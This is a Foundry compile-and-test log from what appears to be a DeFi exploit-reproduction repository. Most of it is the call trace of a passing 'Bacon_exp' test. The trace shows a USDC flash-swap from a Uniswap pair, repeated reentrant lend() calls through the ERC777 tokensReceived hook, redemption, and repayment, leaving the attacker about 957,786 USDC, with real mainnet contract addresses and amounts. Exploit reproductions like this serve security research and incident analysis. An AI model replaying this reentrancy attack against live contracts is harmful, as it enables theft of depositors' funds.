Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:30:28:
   |
30 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                            ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:30:61:
   |
30 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                             ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:30:78:
   |
30 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                                              ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:39:9:
   |
39 |         address operator,
   |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:40:9:
   |
40 |         address from,
   |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:41:9:
   |
41 |         address to,
   |         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:42:9:
   |
42 |         uint256 amount,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:43:9:
   |
43 |         bytes calldata data,
   |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Bacon_exp.sol:44:9:
   |
44 |         bytes calldata operatorData
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 609.19ms (1.81ms CPU time)

Ran 1 test for src/test/2022-03/Bacon_exp.sol:ContractTest
[PASS] test() (gas: 303670)
Logs:
  Before exploit, USDC balance of attacker:: 0
  After exploit, USDC balance of attacker:: 957786585605

Traces:
  [368970] ContractTest::test()
    ├─ [9815] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Before exploit, USDC balance of attacker:", val: 0)
    ├─ [340440] 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc::swap(6360000000000 [6.36e12], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [37517] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6360000000000 [6.36e12])
    │   │   ├─ [36728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6360000000000 [6.36e12]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6360000000000 [6.36e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000005c8cd8a7000
    │   │   │   │   @ 0x28c0947f463362aab09a2d7896ccc847fb7e52633a16b978fb2caf3db1a9b8f8: 0x00000000000000000000000000000000000000000000000000005e0c50d08bb1 → 0x0000000000000000000000000000000000000000000000000000584383461bb1
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [262708] ContractTest::uniswapV2Call(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6360000000000 [6.36e12], 0, 0x00)
    │   │   ├─ [27867] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 10000000000000000000 [1e19])
    │   │   │   ├─ [27078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 10000000000000000000 [1e19]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, value: 10000000000000000000 [1e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [141346] 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62::lend(2120000000000 [2.12e12])
    │   │   │   ├─ [134015] 0x781ad73f140815763d9A4D4752DAf9203361D07D::lend(2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   ├─ [10792] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12])
    │   │   │   │   │   ├─ [9997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, value: 2120000000000 [2.12e12])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x0000000000000000000000000000000000000000000000008ac72116f00f3000
    │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000005c8cd8a7000 → 0x000000000000000000000000000000000000000000000000000003db33b1a000
    │   │   │   │   │   │   │   @ 0x1898482c1b8664f2f0705784b905905edfd299499245fb4f53013718936fd99e: 0x000000000000000000000000000000000000000000000000000000e3d2fca557 → 0x000000000000000000000000000000000000000000000000000002d16cd57557
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb281fc8c12954d22544db45de3159a39272895b169a852b314f9cc762e44c53b) [staticcall]
    │   │   │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   │   │   ├─ [74051] ContractTest::tokensReceived(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2087821912720 [2.087e12], 0x, 0x)
    │   │   │   │   │   ├─ [49314] 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62::lend(2120000000000 [2.12e12])
    │   │   │   │   │   │   ├─ [48483] 0x781ad73f140815763d9A4D4752DAf9203361D07D::lend(2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [5992] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12])
    │   │   │   │   │   │   │   │   ├─ [5197] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, value: 2120000000000 [2.12e12])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000003db33b1a000 → 0x000000000000000000000000000000000000000000000000000001ed99d8d000
    │   │   │   │   │   │   │   │   │   │   @ 0x1898482c1b8664f2f0705784b905905edfd299499245fb4f53013718936fd99e: 0x000000000000000000000000000000000000000000000000000002d16cd57557 → 0x000000000000000000000000000000000000000000000000000004bf06ae4557
    │   │   │   │   │   │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0x0000000000000000000000000000000000000000000000008ac72116f00f3000 → 0x0000000000000000000000000000000000000000000000008ac71f2956366000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb281fc8c12954d22544db45de3159a39272895b169a852b314f9cc762e44c53b) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   │   │   │   │   │   ├─ [28519] ContractTest::tokensReceived(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2751630036547 [2.751e12], 0x, 0x)
    │   │   │   │   │   │   │   │   ├─ [25682] 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62::lend(2120000000000 [2.12e12])
    │   │   │   │   │   │   │   │   │   ├─ [24851] 0x781ad73f140815763d9A4D4752DAf9203361D07D::lend(2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [5992] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12])
    │   │   │   │   │   │   │   │   │   │   │   ├─ [5197] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, 2120000000000 [2.12e12]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, value: 2120000000000 [2.12e12])
    │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x1898482c1b8664f2f0705784b905905edfd299499245fb4f53013718936fd99e: 0x000000000000000000000000000000000000000000000000000004bf06ae4557 → 0x000000000000000000000000000000000000000000000000000006aca0871557
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000001ed99d8d000 → 0
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0x0000000000000000000000000000000000000000000000008ac71f2956366000 → 0x0000000000000000000000000000000000000000000000008ac71d3bbc5d9000
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   ├─ [942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xb281fc8c12954d22544db45de3159a39272895b169a852b314f9cc762e44c53b) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   │   │   │   │   │   │   │   │   ├─ [2087] ContractTest::tokensReceived(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3626491230837 [3.626e12], 0x, 0x)
    │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   @ 35: 2 → 3
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Minted(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount: 3626491230837 [3.626e12], data: 0x, operatorData: 0x)
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3626491230837 [3.626e12])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0x0000000000000000000000000000000000000000000000008ac71f2956366000 → 0x0000000000000000000000000000000000000000000000008ac71d3bbc5d9000
    │   │   │   │   │   │   │   │   │   │   │   @ 52: 0x00000000000000000000000000000000000000000000000000000a5fb1143bc4 → 0x00000000000000000000000000000000000000000000000000000dac0cccf639
    │   │   │   │   │   │   │   │   │   │   │   @ 104: 0x000000000000000000000000000000000000000000000000000006107bae0651 → 0x000000000000000000000000000000000000000000000000000007fe1586d651
    │   │   │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000466c5d078d3 → 0x000000000000000000000000000000000000000000000000000007b321893348
    │   │   │   │   │   │   │   │   │   │   │   @ 35: 2 → 3
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000034c5bb8ba75
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000034c5bb8ba75
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 35: 1 → 2
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Minted(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount: 2751630036547 [2.751e12], data: 0x, operatorData: 0x)
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2751630036547 [2.751e12])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 52: 0x000000000000000000000000000000000000000000000000000007df0725ed81 → 0x00000000000000000000000000000000000000000000000000000a5fb1143bc4
    │   │   │   │   │   │   │   │   @ 104: 0x000000000000000000000000000000000000000000000000000006107bae0651 → 0x000000000000000000000000000000000000000000000000000009ebaf5fa651
    │   │   │   │   │   │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0x0000000000000000000000000000000000000000000000008ac72116f00f3000 → 0x0000000000000000000000000000000000000000000000008ac71f2956366000
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000000000000001e61be22a90 → 0x00000000000000000000000000000000000000000000000000000466c5d078d3
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000280a9ee4e43
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000280a9ee4e43
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 35: 0 → 1
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Minted(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount: 2087821912720 [2.087e12], data: 0x, operatorData: 0x)
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2087821912720 [2.087e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 104: 0x000000000000000000000000000000000000000000000000000007fe1586d651 → 0x00000000000000000000000000000000000000000000000000000bd949387651
    │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x000000000000000000000000000000000000000000000000000001e61be22a90
    │   │   │   │   │   @ 52: 0x000000000000000000000000000000000000000000000000000005f8eb43c2f1 → 0x000000000000000000000000000000000000000000000000000007df0725ed81
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000001e61be22a90
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000001e61be22a90
    │   │   ├─ [1761] 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [930] 0x781ad73f140815763d9A4D4752DAf9203361D07D::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 8465943180104 [8.465e12]
    │   │   │   └─ ← [Return] 8465943180104 [8.465e12]
    │   │   ├─ [42371] 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62::redeem(8465943180104 [8.465e12])
    │   │   │   ├─ [41543] 0x781ad73f140815763d9A4D4752DAf9203361D07D::redeem(8465943180104 [8.465e12]) [delegatecall]
    │   │   │   │   ├─ [2942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x29ddb589b1fb5fc7cf394961c1adf5f8c6454761adf795e67fe149f658abe895) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Burned(operator: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount: 8465943180104 [8.465e12], data: 0x, operatorData: 0x)
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 8465943180104 [8.465e12])
    │   │   │   │   ├─ [24717] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7336924997605 [7.336e12])
    │   │   │   │   │   ├─ [23928] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7336924997605 [7.336e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xb8919522331C59f5C16bDfAA6A121a6E03A91F62, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7336924997605 [7.336e12])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1898482c1b8664f2f0705784b905905edfd299499245fb4f53013718936fd99e: 0x000000000000000000000000000000000000000000000000000006aca0871557 → 0x000000000000000000000000000000000000000000000000000000005db82d72
    │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000006ac42cee7e5
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 52: 0x00000000000000000000000000000000000000000000000000000dac0cccf639 → 0x000000000000000000000000000000000000000000000000000005f8eb43c2f1
    │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000000000000007b321893348 → 0
    │   │   │   │   │   @ 104: 0x00000000000000000000000000000000000000000000000000000bd949387651 → 0x0000000000000000000000000000000000000000000000000000052d06698e6c
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [3164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   │   │   ├─ [2381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   │   │   └─ ← [Return] 6
    │   │   │   └─ ← [Return] 6
    │   │   ├─ [4817] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, 6379138412000 [6.379e12])
    │   │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, 6379138412000 [6.379e12]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, value: 6379138412000 [6.379e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x28c0947f463362aab09a2d7896ccc847fb7e52633a16b978fb2caf3db1a9b8f8: 0x0000000000000000000000000000000000000000000000000000584383461bb1 → 0x00000000000000000000000000000000000000000000000000005e10c58d8991
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000006ac42cee7e5 → 0x000000000000000000000000000000000000000000000000000000df00877a05
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 957786585605 [9.577e11]
    │   │   │   └─ ← [Return] 957786585605 [9.577e11]
    │   │   ├─ [26717] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 957786585605 [9.577e11])
    │   │   │   ├─ [25928] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 957786585605 [9.577e11]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 957786585605 [9.577e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000df00877a05 → 0
    │   │   │   │   │   @ 0x03e1ac56018a4d315eb7131f9060cec9b688d3f9afdf3829eee151eacaecfbf8: 0 → 0x000000000000000000000000000000000000000000000000000000df00877a05
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x0410e4e3d7c6154b75a48d67cdd605fd174a3292feed99ff801a171652f9d12f: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000006ac42cee7e5
    │   │   │   @ 0x28c0947f463362aab09a2d7896ccc847fb7e52633a16b978fb2caf3db1a9b8f8: 0x0000000000000000000000000000000000000000000000000000584383461bb1 → 0x00000000000000000000000000000000000000000000000000005e10c58d8991
    │   │   │   @ 104: 0x000000000000000000000000000000000000000000000000000009ebaf5fa651 → 0x00000000000000000000000000000000000000000000000000000bd949387651
    │   │   └─ ← [Stop]
    │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [delegatecall]
    │   │   │   └─ ← [Return] 103426126875025 [1.034e14]
    │   │   └─ ← [Return] 103426126875025 [1.034e14]
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [staticcall]
    │   │   └─ ← [Return] 38872930099698218968984 [3.887e22]
    │   ├─ emit Sync(reserve0: 103426126875025 [1.034e14], reserve1: 38872930099698218968984 [3.887e22])
